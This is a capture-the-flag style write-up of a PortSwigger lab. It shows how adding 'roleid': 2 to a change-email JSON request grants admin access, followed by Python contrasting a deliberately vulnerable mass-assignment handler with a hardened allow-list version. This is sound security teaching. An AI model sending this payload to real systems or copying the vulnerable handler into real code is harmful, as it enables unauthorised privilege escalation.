
User role can be modified in user profile

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab has an admin panel at /admin. It's only accessible to logged-in users with a roleid of 2.

Solve the lab by accessing the admin panel and using it to delete the user carlos.

You can log in to your own account using the following credentials: wiener:peter

Point: APPRENTICE

Recon

After logging in as wiener, the page redirects to /my-account, which offers a function to change the account email. Submitting a test email sends the following POST request to the server.

POST /my-account/change-email HTTP/2
Host: 0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Cookie: session=redacted
Content-Length: 20
Accept-Language: en-US,en;q=0.9
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{"email":"aa@a.com"}

The server then responds with:

HTTP/2 302 Found
Location: /my-account
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 112

{
  "username": "wiener",
  "email": "aa@a.com",
  "apikey": "redacted",
  "roleid": 1
}

It looks like the server responds with all of the account's information. I wonder why...

Exploit

Submit the request again, but this time add the roleid field to the request JSON.

POST /my-account/change-email HTTP/2
Host: 0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Cookie: session=redacted
Content-Length: 37
Accept-Language: en-US,en;q=0.9
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net
Referer: https://0ac4009c04aba03c80a5351a00c300fb.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

{
    "email":"aa@a.com",
    "roleid": 2
}

The server accepts the change, and guess what: the roleid has changed as well, and we now have access to the admin panel.

HTTP/2 302 Found
Location: /my-account
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 112

{
  "username": "wiener",
  "email": "aa@a.com",
  "apikey": "redacted",
  "roleid": 2
}

Access the admin panel and delete the user carlos to complete the lab.
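The root cause is mass assignment: the change-email handler copies every key of the client JSON onto the stored user record, including roleid. The following is an added example (not the lab's own code) that shows such a handler beside an allow-list version that only accepts the email field and rejects anything else; the user record, field names and ADMIN_ROLEID value mirror the responses above, and the handler names are assumptions.

```python
import json

# Constructed user record mirroring the fields leaked in the lab's 302 body
# (apikey value is a placeholder).
USER_WIENER = {"username": "wiener", "email": "wiener@example.com",
               "apikey": "PLACEHOLDER", "roleid": 1}

ADMIN_ROLEID = 2  # the lab's /admin panel requires roleid == 2

# Only the email field may be written by the change-email endpoint.
# roleid and apikey are server-managed and deliberately absent.
CLIENT_WRITABLE = frozenset({"email"})


def change_email_vulnerable(user, body):
    """Mass-assignment bug: every key in the client JSON overwrites the
    stored record, so a client-supplied "roleid" is silently honoured."""
    updated = dict(user)
    updated.update(json.loads(body))
    return updated


def change_email_hardened(user, body):
    """Allow-list version: copies only whitelisted fields and rejects the
    request if the client tries to set anything else."""
    payload = json.loads(body)
    if not isinstance(payload, dict):
        raise ValueError("JSON object expected")
    extra = set(payload) - CLIENT_WRITABLE
    if extra:
        # Rejecting instead of silently dropping gives the application log
        # a clear signal that a client attempted to set a protected field.
        raise PermissionError(f"protected field(s) in request: {sorted(extra)}")
    email = payload.get("email")
    if not isinstance(email, str) or "@" not in email:
        raise ValueError("invalid email")
    updated = dict(user)
    updated["email"] = email
    return updated


def attempt(handler, user, body):
    """Run a handler and report ('ok', record) or ('rejected', reason)."""
    try:
        return "ok", handler(user, body)
    except (PermissionError, ValueError) as exc:
        return "rejected", str(exc)


def is_admin(user):
    return user.get("roleid") == ADMIN_ROLEID
```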
